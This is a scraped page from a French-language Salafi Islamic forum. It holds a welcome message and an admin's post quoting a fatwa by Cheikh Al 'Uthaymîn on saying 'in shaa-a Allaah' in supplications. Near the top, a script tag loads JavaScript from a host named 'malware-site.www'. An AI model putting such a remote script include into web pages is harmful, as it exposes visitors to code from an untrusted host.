ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    recommandations

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    recommandations

    Message par assalafia le Mer 22 Oct - 20:04

    Surprised 
    recommandations

    Le Cheikh Muhammad ibn Saalih Al ‘Uthaymîn -qu’Allaah lui fasse miséricorde- fut interrogé :

    Quel est le jugement concernant le fait que la personne dise dans son invocation (du’aa) “in shaa-a Allaah” (si Allaah veut)?
    Et telle fut sa réponse :
    Il n’est pas du tout convenable que la personne, lorsqu’elle invoque Allaah, dise “in shaa-a Allaah” dans son invocation. [Il lui incombe] plutôt de se montrer résolue et déterminée dans sa demande et de faire preuve d’une fervente aspiration, certes nul ne peut contraindre Allaah. De plus, Allaah a effectivement dit:

    ادْعُونِي أَسْتَجِبْ لَكُمْ
     
    {invoquez-Moi et Je vous répondrai} [S.40, v.60],

    garantissant ainsi Sa réponse. De ce fait, il n’y a donc aucun besoin de dire “in shaa-a Allaah”. Ceci car lorsqu’Allaah accorde à Son serviteur de l’invoquer et le lui facilite, alors Il repond indubitablement: soit en exauçant sa demande, soit en repoussant de lui un mal, soit en lui réservant [le fruit de] cette invocation pour le jour de la résurrection. Et il est rapporté de source sûre que le prophète صلى الله عليه وسلم a dit: “Que nul ne dise: ô Allaah, pardonne-moi si tu veux! Ô Allaah, fais-moi miséricorde si tu veux! Qu’il se montre plutôt résolu dans sa demande et fasse preuve d’une fervente aspiration, car certes nul n’est en mesure de contraindre Allaah.”
    Et si quelqu’un venait à dire: n’est-il pas authentiquement rapporté que le prophète صلى الله عليه وسلم disait au malade: “aucun mal [n’est à craindre], c’est une purification “in shaa-a Allaah”?
    Nous lui dirions: tout à fait, mais ceci semble à priori ne pas être de l’ordre de l’invocation, mais plutôt de l’ordre de l’information, de l’expression de ce que l’on attend et espère, sans que cela ne soit une invocation.
    Il fait donc partie des bienséances, lors de l’invocation, que la personne se montre résolue et déterminée dans sa requête. Et Allaah est plus savant.”

    (Extrait du recueil des écrits et “fataawaa” du Cheikh, le premier volume, chapitre “al ‘ibaadah”)
    والله أعلم

      La date/heure actuelle est Sam 18 Nov - 9:16